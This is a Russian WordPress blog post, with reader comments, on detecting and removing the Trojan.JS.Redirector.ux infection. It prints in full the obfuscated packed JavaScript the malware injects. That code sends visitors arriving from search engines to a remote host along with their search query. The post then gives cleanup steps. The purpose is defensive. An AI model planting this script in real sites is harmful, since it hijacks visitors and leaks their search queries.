Найти и удалить Trojan.JS.Redirector.ux. Новое имя старого знакомого
Всем привет! Вот уж не думал, что снова встретимся! Да нет же, это я не вам, читатели «Первого блога альтруиста» — в нашей встрече я уверене, а новому вирусу, который называется Trojan.JS.Redirector.ux. Поражает он в основном сайты wordpress, а мне потом возись с ним. Но я-то думал, этот вирус новый, а он оказался тем же JS/RefC-Gen или Mal/Iframe-AD.
Как же я его узнал? Конечно же по вредоносному коду, который он в себе несет. Многие вирусы попадают к нам на сайт совершенно случайно, пробивают пороли FTP, а потом мануально (в ручную), но скорее всего автоматически, располагаются в удобном (вирусу) и неприметном (для нас) месте.
Обо всем по порядку, сначала пример кода, найдя который знайте — ваш сайт обязательно заражен Trojan.JS.Redirector.ux.
1 2 3 4 5 | <script type="text/javascript" language="\"JavaScript\"">// <![CDATA[ eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query ||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locatio n'.split('|'),0,{})) // ]]></script> |
или
1 | echo "<script type="text/javascript">// <![CDATA[ |
или
1 | add_sscounter() |
Как найти код вируса на сайте быстро?
1. Начинайте проверку с functions.php. Если код вируса есть, то скорее всего в самом низу файла. Также просмотрите сразу файл index.php.
Насчет index.php. Как вы знаете, такой файлик почти в каждой папке темы. Зачастую в нем написано всего лишь закомментированное «Silence is golden.» Но вот если index.php темы заражается, то заражаются все файлы index.php. Также это касается файлов с расширением .js.
2. Скачайте файлы темы wordpress на компьютер. Найдите скачанную папку Total Commander’ом. Кликните по ней правой клавишей мыши, выберите «Найти», далее «С текстом» и введите часть одного из кодов, описанных выше, например:
1 | p,a,c,k,e,r |
Внимание! Код в файле jquery.min.js — не вредоносный! Антивирус ClamAV постоянно называет этот абсолютно нормальный файл, как зараженный вирусом PUA.Script.Packed-1 или PUA.Script.Packed-2.
3. Самый брутальный, но очень действенный метод удаления вируса. Удаляем с хостинга все папки и файлы кроме:
— картинок и медиафайлов, вроде wp-content/uploads и image;
— robots.txt, .htaccess, sitemap.xml.gz, sitemap.xml и wp-config (не забываем проверить их на код);
— header.php, single.php и другие файлы темы, содержащие коды Яндекса, Google, Vkontakte и так далее (аналогично, проверяем на код вируса).
Потом перезаливаем wordpress, папку темы и закачиваем плагины. На всякий случай скачивал базы данных, проверял их, но не разу не находил там вирус. Готово.
Существует ряд ресурсов для проверки сайта на вирус, посоветую три:
1. http://www.virustotal.com/
2. http://antivirus-alarm.ru/proverka/
3. http://xseo.in/viruscan/
А как было у меня на этот раз?
Начнем с того, что две недели назад появился новый вирус wordpress Trojan.JS.Redirector.ux. Этому событию я уделил мало внимания, так как все мои сайты живы-здоровы и тема «удаление вируса с сайта wordress» хорошо раскрыта на «Первом блоге альтруиста».
И вот захожу я на один свой старенький сайт, который тоже вроде как жив-здоров, но касперский замечает в файлах-расцветках темы вредоносный код. Спокойно удаляю старую тему, нахожу более новую тему wordpress, заливаю ее на хостинг и несколько дней оптимизирую под контент сайта, а контент сайта делаю под тему.
Но через несколько дней, жму на RDS-бар, желая узнать дату последней индексации сайта гуглом, вместо даты стоит слово «Нет», нажав на которое, впадаю в ступор:
Выполнил все три пункта проверки, ни один из ресурсов проверки сайта не видит вирус, все вроде как хорошо, но… Включаю RDS-бар (на других сайтах работает исправно), жму на «Нет» индескации гугла и вижу картинку выше.
Только спустя несколько дней, понимаю, что вирус не на сайте, а в кэше (памяти) Google. Т.е. при последнем заходе, еще при «вирусной» теме поисковик запомнил, что сайт плох. А сайт бодр и здоров!
Чего желаю и вашим сайтам!
Все вопросы пишите в комментарии — с радостью отвечу. Буду благодарен, как и многие владельцы зараженных сайтов, за +1 или ретвит. А чтобы быть в курсе всех новостей сайта — подписывайтесь!
Удачи, пока.
Скажите а что за вирус который определяется как PHP.Hide
Спасибо большое за ответ! Но я не под АГС, а в индексе меня нет. Конечно я уже неоднократно написал в обе поддержки, но пока результатов ноль.
И еще один вопрос, в файлх сайта могут быть строки в которых фигурирует base64 без вреда для сайта.
Могут быть и такие не вредоносные строки.
Здравствуйте! Прошу совет. Мой сайт взломали, напичкали разными вредностями и раассылали, а похоже и сейчас продолжают рассылать спам. Меня быстренько закрыли и в гугле и в яндексе. После того как я, что смог поудалял, гугл снова меня видит. Яндекс молчит. Хочу вас спросить,можно ли как нибудь определить возможно востановить сайт или бороться уже бесполезно? А сейчас как я понимаю на сайт идет еще и DDOS атака. Проссто столько сил вложено в форум прикрепленный к сайту, что снова уже не согу начать заново. Спасибо большое за хорошую статью и заранее большое спасибо за ответ!
Здравствуйте!
Во-первых, отправьте письмо Платонам из Яндекса, скажите, что ваш сайт очищен от вирусов.
Во-вторых, прекратите переживать. Мой блог выходил их АГС около 2-3 месяцев, а по выходу вернули и тИЦ десятку.
Успехов!
Добрый вечер.
просмотрел статью.
интересный материал.
Спасибо.
проверил сайты, ничего не нашёл.
а что скажете по поводу этих вирусов:
HTML:Redirector-BV[Trj]
HTML:Redirector-BW[Trj]
приходит на почту сайта,
«Get Permanent Forum Links To Improve Web Presence»
от «Forum Submission Service» и различные_адреса@gmail.com
и обнаруживается c avast, глушит его, и только при испрользовании Microsoft Outlook в стационарном компе.
больше нигде, ни на сервере, ни на мобильных его и не видно
Сможете подсказать, что это и как его?
Спасибо.
Здравствуйте! Не сталкивался пока.
Напишите мне через форму обратной связи http://blogalt.ru/svyazhites-so-mnoj, если вопрос актуален.